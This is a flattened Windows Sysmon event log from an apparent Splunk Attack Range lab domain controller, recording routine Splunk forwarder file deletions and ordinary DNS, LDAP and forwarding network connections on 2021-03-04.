Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB06F0A6AA3DA704937EEF26353B9928,SHA256=12543D195D887A987495821FA5216CAF60F4945042E7ADB84C0103107912C9B3,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002199968Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:22.059{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55089-false10.0.1.12-8000- 23542300x80000000000000002199971Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:27.783{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C3901D204E5E58124B1B94A5F3DEEEC,SHA256=0B72794218D5A11BD5BF9B9D376754142A55327FF35170CA684142CBA4FEA913,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199972Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:28.798{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45C0A8836189698CC6C99B0941B1DAE6,SHA256=13AF6E4FDADDFEEF9F8B3A6B3AFEEC33A985023EB60CAB77C29420244C28A8BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199973Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:29.814{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E4F50F83045597EB164C909DA39E736,SHA256=CF89D39BC1FC2A56D6B40F735CA0C4365DEDB3532DF7E66B13D0DCF678EF4D81,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199975Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:30.861{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5570773EF9815E976F2B3D604D2E089D,SHA256=A2BCC245C449E1A48B7E828FB9F1D2846CDEF31B1483E4F3E92F374F14F62986,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199974Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:30.252{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E391D8A2A618483CCBFFF319973D16D2,SHA256=F2B71789250420214B8F0C3CC0C030B4DDFE654758988A372E18CC2964DFBDE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199977Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:31.877{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=83220423A05C051C265D0B8590523A08,SHA256=EBD362CF06C41D6F7F167507B4C191FF118E293F8B34C545478520CD19963212,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002199976Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:27.090{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55090-false10.0.1.12-8000- 23542300x80000000000000002199978Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:32.908{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6FB8097A383B7CAA1BB79DF3E49BD26F,SHA256=CDBB3C8CB0092FCFFAF1B87FDCCA4F108659E06BBB7894A50B6B1A8A723352F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199979Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:33.908{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45399D807CA2F76356FC5DEDE5BD5F32,SHA256=CFDEB12BFB56A6B677B463EC64877744CDC4F8C7A1E3A61D9E841EF47F31C4E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199980Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:34.939{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5FF1E9F2978D1F1B355F854C3755601F,SHA256=B3B4E0FB4A4DAD063DB0177F969B5A0A8C0F3DED5720A6171BE876FB21CAF519,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199981Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:35.955{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=14DBB6DD060240F02741E576B4BA20A1,SHA256=22AC631B23391BA3D11689BF797F60EEFE468DDA3E686773445DAEB7C8CBFE45,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199985Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:36.970{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E937C73F2C907DEA5CC101140782730F,SHA256=9010ADD50A803C6A6FD4D5BDCC2BF22D368E5746320E2B018442B2A16D5D636D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002199984Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:32.887{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55091-false10.0.1.12-8000- 23542300x80000000000000002199983Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:36.158{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E657198EECB2D3A5C9D74F6C97C29219,SHA256=52F835F182D7C0DC983ECA010129AA43EBE642C8B6972E0337BFFAFEA1385042,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199982Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:36.158{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=277C6EDEA6C00B641671FF2D8CA4B6A5,SHA256=47DC7411E3BB2B0AA9688C1D81AD16513AF43F84008583D713D7533CF328F47A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199986Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:37.970{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F26ADAADFC3293BCB28E333B4EE5CF8,SHA256=D5CC9A4B39ED8C503DC1C61D0106AAFDE6795CAEDF72F6519E71F1A610DA3763,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199987Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:39.002{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1521682F4B520A4FB8E3254A0F0A4E0D,SHA256=BE851EA3225382810EDEF959108CDA3FE079372386986CFB05C2FE5FC74A3820,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002199990Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:37.371{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53457- 23542300x80000000000000002199989Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:40.549{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E657198EECB2D3A5C9D74F6C97C29219,SHA256=52F835F182D7C0DC983ECA010129AA43EBE642C8B6972E0337BFFAFEA1385042,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199988Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:40.002{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=830A72FA3EF4F4314D69C870D4B3560D,SHA256=3DA16B2C0B4122E16485448C81BA93E1AC35CCAD7811A89BDCDAC0EA437C5FC3,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002199994Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:38.387{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-53457- 354300x80000000000000002199993Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:37.950{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55092-false10.0.1.12-8000- 23542300x80000000000000002199992Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:41.564{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=876BBFF00EC0EA8B856B6250E6E75E20,SHA256=D202FBE2EFB2C0F2D004DD1743FC6303E8F3DB9909C1E1581FD4F05E75E54587,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199991Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:41.017{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A5CA3BE5EEFF5C842831FF7802E2FBE7,SHA256=9AF2A78B4F03C4259901DC88332104B3B75A1E637C7F49AF8E8BC6148B082972,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199995Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:42.049{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B52D13687C2BE7EC8E0E9561E64A1311,SHA256=EC80388F28D720E53566F3CD1080AF00D65E9C82EE800E0000D924AC558A857B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199996Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:43.080{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E29187875172E41A355ACD045D07C71B,SHA256=5948ADD8BC032BFCF2ACCFA96C717445473965891CD5F37B34474FE62976B9B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199997Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:44.095{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC2A49E45B3B0B9622CE37EB49A6079A,SHA256=145EFA1593C83A5E7E125D09681FDB9BD0209DCAC3EAE6448A2F5A66015FBD44,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199998Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:45.127{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=60EED396444F61A9F35285DBE16344A7,SHA256=EBAC317286FC70E46585E3E6E60AFB27A81D3D6689EEF8F620D2C0AAA75F6696,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200000Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:46.142{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9C812E12BBA93449ADC3B5F1D1EE4E0A,SHA256=304F7627D0DE792879BC1C833A8E79E2B235337561DB8E4E7C6620C47F661968,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199999Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:46.142{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1EB642A4AEFCCDC0BD1ED8E03A219852,SHA256=D0ED06E915FD9EF954389D7E7FBB3D33BA1C237BA752FF6404B291C99C53063F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200002Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:47.158{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=50E12AA841BFA4CE4C1B143E9B01E4CE,SHA256=BE913CB41E738889E0E711D3CFD3364E62DE598AAD6E223018169C19C98243AA,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200001Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:42.950{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55093-false10.0.1.12-8000- 23542300x80000000000000002200004Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:48.814{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8DE19A08C37F5114A02AEE986934DD88,SHA256=6B27B4AB635641CCF58846545856D8B58FBD82D14EA7C1531D7609246BE36DF3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200003Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:48.189{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5FD0D0F62E8C17171A0B4A7B13E366BB,SHA256=8A1567F9B8ED6551F970EB26DF87D542161ECFE780D78AD44F4D3420BC0E1F9D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200005Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:49.220{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BCE29D4C7AAF7416EF820354BFAB8E71,SHA256=97B6DAA5B724B9AC3BCDC8093D70271D50119C57390119F4A7970B3AAB1D7D82,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200006Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:50.236{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9742BD16A8B9D144763E12AE6E1DA75E,SHA256=51987F2885D09658063C3D2640760CA4BA9A30D58DEAD9550DD1280950AFAAB9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200007Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:51.252{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1EC049C33107A55A0C6EDC82D20116EF,SHA256=3D84DE8F9F32CB4B26060474AE979290A911B9605F7E9F9CD63E7CD5EA36172A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200009Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:52.252{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2DEB8611A1FCA93F8EA98E3B90B0C260,SHA256=F7FCBA2571028662A2AEDC123A2C24FC11343B25AAF746D7520ECF24E2F65801,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200008Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:52.236{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=77E4EAD05DD8DD1E5E5862C2FB8998EF,SHA256=2C460AB38D3EA71927A86DB74CF82221AF52175D5DE225CEB45B1E73D7872ED1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200012Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:53.784{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=580ED9A9DE0BB8D03FAFF99C4984786A,SHA256=61EE5FF2C4CC6553754A4C22D52EA9D4CBD842C0DC53708EBB135693F9BC5FAB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200011Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:53.267{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB1B2C761BD71CAB2D788918D44E89C7,SHA256=D3DEF84A48BE531746908878213E4E418C0D28A2028B86558678B6837ADBE41A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200010Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:48.965{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55094-false10.0.1.12-8000- 23542300x80000000000000002200013Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:54.269{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6EADD919AB7FA7E79F72EF5DC1CF58CA,SHA256=42C52E03797C51DC4A8BC7AAC0F5169A8B8F774BD43DBA11535AC04903ECD890,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200015Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:55.284{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=985B61B30747EC9B93FC6A3D7BCA2F4E,SHA256=6E8BEBDB7F13D1BF0CFCC73267467787DFE05CD518A8628010D83465E2FE77B4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200014Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:50.939{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local55394- 23542300x80000000000000002200018Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:56.969{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4ADD9D2951AB899132C828F0D685C2D9,SHA256=EE38671D8D073DEBB0899B5B5B21B43823F2DB89E4714FE10A86CBA537CCE6ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200017Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:56.297{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=599B8EFB0354E2F8126D17FE029FA7EF,SHA256=AF692D520A5F0129F0EE32E82CD32720C5CB68E54B15DB2269270BFBE5DCDA54,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200016Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:51.060{5ABCFE62-842F-603E-1500-00000000AD01}1104C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcptruefalse10.0.1.14win-dc-228.attackrange.local55095-false72.21.81.240-80http 23542300x80000000000000002200019Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:57.328{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=558582168FB29EB150F6FA1362014229,SHA256=5912D5BD177088529E24360E91D7D138C64B4C2D6C956E7A305682530AC180A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200023Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:58.331{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E2129AAF49705B03B767A0963378FE0,SHA256=F5BB156351564262279288C525ADB8CE9D6124C6FA502AC5876B94614D55CFF9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200022Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:58.237{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F787400A0BF0288AF6AD340B95FBC344,SHA256=034406371AFF17EDB9799B0D4A0BE675004D91CA271A3919B616203011BEE486,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200021Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:51:53.808{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local55096-true0:0:0:0:0:0:0:1win-dc-228.attackrange.local389ldap 354300x80000000000000002200020Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 